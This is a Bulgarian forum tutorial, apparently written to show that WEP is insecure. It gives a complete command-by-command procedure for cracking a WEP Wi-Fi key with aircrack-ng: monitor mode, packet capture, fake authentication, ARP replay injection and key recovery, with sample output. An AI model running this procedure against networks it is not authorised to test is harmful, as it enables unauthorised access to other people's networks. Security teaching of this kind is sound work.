Разбиване на WEP защита или защо не трябва да се ползва WEP.

Ниво: Basic

Целта на това “упражнение” е да ви покажа максимално детайлно, колко е лесно разбиването на WEP key (Wired Equivalent Privacy) “защитени” мрежи, неговата непрактичност и остарялост.

Предположения:

• Ползвате Линукс.
• Имате инсталирани и пачнати драйвъри за вашата карта. - Не е и няма да бъде част от това ръководство!
• Имате елементарна представа за Линукс.
• Имате инсталиран Aircrack-ng . Инсталирането не е и няма да бъде част от ръководството!
• Знаете що е то конзлола и има ли почва тя у нас.

---

Екипировка използвана за това ръководство:

• Ubuntu Linux 9.04 (jaunty)
• Aircrack-ng 1.0-rc3
• D-Link DWL-G122 H/W ver.: C1 F/W ver.: 3.00
• rt73 driver ver.: 1.0.3.6

Бележка: При различните драйвъри (макар и малко) е различен и начина на кракване!

Не те сигурни дали вашата карта е съвместима с Aircrack-ng или въобще с Линукс ?

• Тук може да проверите дали картата ви е съвместима с Aircrack-ng
• А тук, дали въобще е съвместима с Линукс. Ще намерите също и полезна информациа за драйвърите

---

Rock n' Roll

Кракването на WEP под Ubuntu се различава от това под BackTrack. При Ubuntu има процеси (програми), които работят на фонов режим, и които пречат значително на целия процес. На пример сменят периодично wifi канала търсейки нови мрежи. Те трябва да бъдат спряни.

sudo airmon-ng check

ви показва списък с пречещите програми

sudo airmon-ng check kill

Спира тези програми.
За да пуснем нужната ни карта:

Sudo ifconfig wlan1 up

Бележка: При спирането на тези програми няма да имате интернет. За това си запишете това ръководство като текстови (или какъвто на вас ви е удобен) файл.

---

2 -Намиране на детайли за желаната мрежа. Може да се ползва всеки интерфейс.

Командата iwlist сканира мрежите във вашия обхват и ви дава детайлна информация за таях. Съществуват и други програми за сканирене но в случая ще използваме тази. Разгледайте дадените детайли и сами ще откриете нужната ви информация.

sudo iwlist wlan1 scan

wlan1 ...Интерфейс
scan ...Сканиране

---

3 - Поставяне на картата в Monitor Mode

Преди да започнем ARP request атаката трябва да поставим какртата в режим “Monitor”. Командата iwconfig ще ви покаже списък с наличните интерфейси:

iwconfig

При вас може да е различно, но при мен нещата стоят така:

eth1 – вградената wifi карта
wlan1 – usb картата, която ще ползвам при атаката.

При поставянето на wlan1 в Monitor Mode ще се появи нов интерфейс. При мен – mon0. От сега нататък ще ползваме само този интерфейс.

sudo airmon-ng start wlan1 1

wlan … интерфейс
1 … канал. Не е задължителен но “отсява плявата”

---

4 - Прихващане на пакети с airodump-ng

Стартирайте airodump-ng за прихващането на пакети. Секунди след стова ще забележите клиенти ползващи/свързани към мрежата. Клиентите са под поле STATION долу – ляво на конзолата. Можете да си запишете MAC адреса на някои от клиентие или на един от тях. Ако няма клиенти не е толкова страшно, стига настройките на рутера да не включват филтриране по MAC адрес. MAC филтрирането (ако има свързан клиент към мрежата) отнема минутка да се “пребори”, но няма да е част от това ръководство. Важното е, че със или без MAC филтриране е “все тая”

sudo airodump-ng -c 1 -d 00:1E:69:E5:56:3D -w campari mon0

-c ... Канал
-d … BSSID Мак адрес на рутъра
-w … Избрано от вас име на файл, който ще съдържа данните
mon0 … Интерфейс




Детайли към снимката:

PWR … Сила на връзката. По-малки стойности е по-добре.
RXQ … Качество на сигнала.
#Data … Количество прихванати пакети. Това ни интересува.
#/s … Количество прихванати пакети за секунда. От 1 до 50 е бавно. 200 в секунда е идеален вариант
STATION … Клиенти използващи мрежата

---

5- Проверка дали MAC филтъриране е включено.

sudo aireplay-ng -1 0 -a 00:1E:69:E5:56:3D -h MY:MA:CA:DD:RE:SS mon0

-1 … лъжливо удостоверение за сесия. “0” - изпълнява се веднъж
-a … MAC адрес на
-h … MAC адрес по ваш избор. В моят случай си избрах 00:1E:69:E5:56:69
mon0 … интерфейса

Ако видите следното нещо, значи няма MAC защита:

      18:22:32 Sending Authentication Request 
      18:22:32 Authentication successful 
      18:22:32 Sending Association Request 
      18:22:32 Association successful :-)

---

6– Инжектиране на пакети чрез aireplay-ng
В нова конзола пускаме самата атака към рутъра. След известно време ще видите #Data (количеството събрани пакети) да се покачва. Това е добър знак. Ако не се покачва – бъдете търпеливи, процеса изисква време. Понякога от секунди до 5-10 минути.

sudo aireplay-ng -3 -b 00:1E:69:E5:56:3D -h MY:MA:CA:DD:RE:SS mon0

-3 … Стандартна ARP reply атака
-b … MAC адреса на мишената.
-h … Избраният от вас MAC адрес.
mon0 … Интерфейс.

---

7 – Дешифриране на WEP ключа с aircrack-ng

Не е нужно да се спират горните процеси. Дешифрирането на ключа може да стане (даже е препоръчително) докато всички горни процеси си работят, за да може повторно му изпълнение про положение, че опита е неуспешен.

aircrack-ng campari*.cap

*… Wildcard. Разгледайте си Home директорията и ще раберете защо.

Бележка:
IV's нужни за дешифрирането са от 20 000 до към 100 000. Случвало ми се е и 4 000 да ми стигнат, но не разчитайте на това.

Here you go

“Най-сигурния” 128 bit WEP ключ за 15 мин със смешно нисък клас USB wifi карта. 25#/s при положение, че 200#/s е нормалното

 

---

БЕЛЕЖКИ:
Паролата на рутъра ви не е дефолтна, нали? Нали?
Ако рутъра, който тествате не е вашият – ИСКАЙТЕ РАЗРЕШЕНИЕ.
Много писане, за 10 мин работа. Толкова трябват за разбиване на WEP !!!
Моля ако някой има желание да преведе горното на Английски език, да се чувства свободен. Ще съм много благодарен.

За повече информация не ме търсете.


Автор: CAMPARi
Източник:Форум АренаБГ